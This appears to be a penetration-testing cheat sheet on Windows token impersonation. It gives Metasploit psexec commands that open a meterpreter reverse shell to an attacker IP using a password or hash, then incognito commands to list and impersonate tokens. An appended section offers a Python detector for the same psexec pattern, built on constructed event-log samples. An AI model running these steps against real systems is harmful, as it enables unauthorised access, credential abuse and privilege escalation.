Token Impersonation

Connect to a Device using Metasploit

msfconsole
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp

set lhost [Attacker IP]

set rhosts [Target IP]

set smbuser [Username]

# set SMBPASS [Hash] (If you only have the hash, you can only pass the hash locally)
set smbpass [Password]

# unset smbdomain (if you want to authenticate as a local account instead of a domain account)
set smbdomain [Domain]

run

Load Incognito Module

load incognito

List Tokens

list_tokens -u

[Screenshot: Incognito: List Tokens]

Impersonate Token

impersonate_token [Domain]\\[Username]

[Screenshot: Incognito: Impersonate Token]
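
Detecting the Connection Step (added example)

Defender's view of the psexec connection step above, added here and not part of the original page or of Metasploit: a psexec-style connection authenticates over SMB and then installs a service on the target, which Windows records as a network logon (Security event 4624, LogonType 3) followed by a service install (System event 7045). The event records below are constructed, and the simplified field names, the function name `find_remote_service_installs` and the 30-second window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample records (not captured from a real host). Fields are a
# simplified subset of Security 4624 (logon) and System 7045 (service install).
EVENTS = [
    {"time": "2024-05-01T10:00:00", "host": "WS01", "id": 4624, "logon_type": 3,
     "user": "CORP\\alice", "src_ip": "10.0.0.50"},
    {"time": "2024-05-01T10:00:04", "host": "WS01", "id": 7045,
     "service": "qWzRtYpL", "image_path": "%SystemRoot%\\kXcVbNmA.exe"},
    # Interactive logon (type 2) before a service install: not a remote pattern.
    {"time": "2024-05-01T11:30:00", "host": "WS02", "id": 4624, "logon_type": 2,
     "user": "CORP\\bob", "src_ip": "-"},
    {"time": "2024-05-01T11:30:10", "host": "WS02", "id": 7045,
     "service": "VendorUpdater", "image_path": "C:\\Program Files\\Vendor\\upd.exe"},
    # Network logon, but the service install comes 60 s later (outside 30 s).
    {"time": "2024-05-01T12:00:00", "host": "WS03", "id": 4624, "logon_type": 3,
     "user": "CORP\\carol", "src_ip": "10.0.0.7"},
    {"time": "2024-05-01T12:01:00", "host": "WS03", "id": 7045,
     "service": "BackupAgent", "image_path": "C:\\Backup\\agent.exe"},
]


def find_remote_service_installs(events, window_seconds=30):
    """Return an alert for each 7045 service install that follows a network
    logon (4624, LogonType 3) on the same host within window_seconds."""
    window = timedelta(seconds=window_seconds)
    logons = {}  # host -> [(timestamp, logon event), ...] in time order
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4624 and ev.get("logon_type") == 3:
            logons.setdefault(ev["host"], []).append((ts, ev))
        elif ev["id"] == 7045:
            near = [lg for t, lg in logons.get(ev["host"], []) if ts - t <= window]
            if near:
                lg = near[-1]  # closest preceding network logon
                delay = ts - datetime.fromisoformat(lg["time"])
                alerts.append({"host": ev["host"], "user": lg["user"],
                               "src_ip": lg["src_ip"], "service": ev["service"],
                               "image_path": ev["image_path"],
                               "delay_s": delay.total_seconds()})
    return alerts


if __name__ == "__main__":
    for alert in find_remote_service_installs(EVENTS):
        print(alert)
```

Event 7045 carries no source address, so the alert takes the user and source IP from the correlated 4624 record; legitimate remote administration tools produce the same pair of events and need an allowlist.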
